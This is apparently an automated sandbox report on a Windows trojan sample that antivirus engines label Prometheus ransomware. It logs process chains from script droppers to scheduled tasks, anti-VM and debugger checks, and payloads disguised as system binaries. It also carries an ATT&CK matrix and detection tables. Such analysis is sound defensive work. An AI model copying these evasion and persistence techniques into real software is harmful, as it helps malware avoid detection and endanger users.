            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeMemory allocated: 1A6D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeMemory allocated: 920000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeMemory allocated: 1A7D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeMemory allocated: 1890000 memory reserve | memory write watch
            Source: C:\Users\Public\Desktop\spoolsv.exeMemory allocated: 1B450000 memory reserve | memory write watch
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeMemory allocated: 10D0000 memory reserve | memory write watch
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeMemory allocated: 1AB10000 memory reserve | memory write watch
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeMemory allocated: 980000 memory reserve | memory write watch
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeMemory allocated: 1A700000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWindow / User API: threadDelayed 525Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWindow / User API: threadDelayed 1599Jump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeWindow / User API: threadDelayed 367
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeWindow / User API: threadDelayed 365
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeWindow / User API: threadDelayed 367
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe TID: 6348Thread sleep count: 525 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe TID: 5512Thread sleep count: 1599 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe TID: 6552Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exe TID: 2300Thread sleep count: 269 > 30Jump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exe TID: 2300Thread sleep count: 139 > 30Jump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exe TID: 5144Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exe TID: 5560Thread sleep count: 367 > 30
            Source: C:\Users\Public\Desktop\spoolsv.exe TID: 5636Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 4012Thread sleep count: 365 > 30
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 6400Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 6536Thread sleep count: 367 > 30
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe TID: 5564Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0080A5F4
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0081B8E0
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082AAA8 FindFirstFileExA,0_2_0082AAA8
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081DD72 VirtualQuery,GetSystemInfo,0_2_0081DD72
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: 5U9CuGu1ru.exe, 00000000.00000002.2054403439.0000000003472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
            Source: wscript.exe, 00000002.00000003.2137616008.0000000002EC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: containerdll.exe, 00000006.00000002.2189554386.00000000006B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bc
            Source: 5U9CuGu1ru.exe, 00000000.00000003.2050948775.0000000003472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
            Source: containerdll.exe, 00000006.00000002.2214167669.000000001B679000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}uint32M
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeAPI call chain: ExitProcess graph end nodegraph_0-23710
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0082866F
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082753D mov eax, dword ptr fs:[00000030h]0_2_0082753D
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082B710 GetProcessHeap,0_2_0082B710
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeProcess token adjusted: Debug
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeProcess token adjusted: Debug
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081F063 SetUnhandledExceptionFilter,0_2_0081F063
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0081F22B
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0082866F
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0081EF05
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" Jump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081ED5B cpuid 0_2_0081ED5B
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0081A63C
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeQueries volume information: C:\Users\Public\Desktop\spoolsv.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeQueries volume information: C:\Users\Public\Desktop\spoolsv.exe VolumeInformation
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeQueries volume information: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe VolumeInformation
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeQueries volume information: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe VolumeInformation
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0081D5D4
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080ACF5 GetVersionExW,0_2_0080ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.2270348613.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: containerdll.exe PID: 748, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 6416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 1292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 940, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 2140, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.2270348613.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: containerdll.exe PID: 748, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 6416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 1292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 940, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 2140, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information12
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            1
            Scheduled Task/Job
            11
            Process Injection
            123
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            12
            Scripting
            1
            Scheduled Task/Job
            1
            Disable or Modify Tools
            LSASS Memory121
            Security Software Discovery
            Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            31
            Registry Run Keys / Startup Folder
            31
            Registry Run Keys / Startup Folder
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Process Injection
            NTDS31
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials3
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing
            DCSync37
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1531316 Sample: 5U9CuGu1ru.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Antivirus detection for dropped file 2->56 58 15 other signatures 2->58 9 5U9CuGu1ru.exe 3 12 2->9         started        12 spoolsv.exe 3 2->12         started        15 WHqeodkmYpJedFVKZpNEincEtJvAcD.exe 2->15         started        17 2 other processes 2->17 process3 file4 40 C:\Users\user\AppData\...\containerdll.exe, PE32 9->40 dropped 42 C:\Users\user\...\k6u1xEDPWjfrPQve79LV.vbe, data 9->42 dropped 19 wscript.exe 1 9->19         started        22 wscript.exe 9->22         started        70 Antivirus detection for dropped file 12->70 72 Multi AV Scanner detection for dropped file 12->72 74 Machine Learning detection for dropped file 12->74 signatures5 process6 signatures7 60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->60 24 cmd.exe 1 19->24         started        process8 process9 26 containerdll.exe 15 34 24->26         started        30 conhost.exe 24->30         started        file10 44 C:\...\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe, PE32 26->44 dropped 46 C:\...\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe, PE32 26->46 dropped 48 C:\...\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe, PE32 26->48 dropped 50 12 other malicious files 26->50 dropped 62 Antivirus detection for dropped file 26->62 64 Multi AV Scanner detection for dropped file 26->64 66 Creates an undocumented autostart registry key 26->66 68 6 other signatures 26->68 32 schtasks.exe 26->32         started        34 schtasks.exe 26->34         started        36 schtasks.exe 26->36         started        38 27 other processes 26->38 signatures11 process12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            5U9CuGu1ru.exe64%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            5U9CuGu1ru.exe100%AviraVBS/Runner.VPG
            5U9CuGu1ru.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Recovery\ShellExperienceHost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Users\Default\Documents\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Users\Public\Desktop\spoolsv.exe100%AviraHEUR/AGEN.1323984
            C:\Recovery\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\kVQjSoqMfO.bat100%AviraBAT/Delbat.C
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe100%AviraVBS/Runner.VPG
            C:\Recovery\ShellExperienceHost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Users\Default\Documents\WmiPrvSE.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Users\Public\Desktop\spoolsv.exe100%Joe Sandbox ML
            C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe100%Joe Sandbox ML
            C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe100%Joe Sandbox ML
            C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\RuntimeBroker.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\ShellExperienceHost.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Default\Documents\WmiPrvSE.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Public\Desktop\spoolsv.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe82%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecontainerdll.exe, 00000006.00000002.2190779031.0000000002803000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            No contacted IP infos
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1531316
            Start date and time:2024-10-11 01:26:06 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 8s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:43
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:5U9CuGu1ru.exe
            renamed because original name is a hash value
            Original Sample Name:752748b4c26423542f08b2d3bdd47a42.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@42/37@0/0
            EGA Information:
            • Successful, ratio: 16.7%
            HCA Information:
            • Successful, ratio: 64%
            • Number of executed functions: 363
            • Number of non-executed functions: 94
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, f0908023.xsph.ru, pastebin.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target WHqeodkmYpJedFVKZpNEincEtJvAcD.exe, PID 2140 because it is empty
            • Execution Graph export aborted for target WHqeodkmYpJedFVKZpNEincEtJvAcD.exe, PID 940 because it is empty
            • Execution Graph export aborted for target containerdll.exe, PID 748 because it is empty
            • Execution Graph export aborted for target spoolsv.exe, PID 1292 because it is empty
            • Execution Graph export aborted for target spoolsv.exe, PID 6416 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: 5U9CuGu1ru.exe
            TimeTypeDescription
            01:27:09Task SchedulerRun new task: spoolsv path: "C:\Users\Public\Desktop\spoolsv.exe"
            01:27:09Task SchedulerRun new task: spoolsvs path: "C:\Users\Public\Desktop\spoolsv.exe"
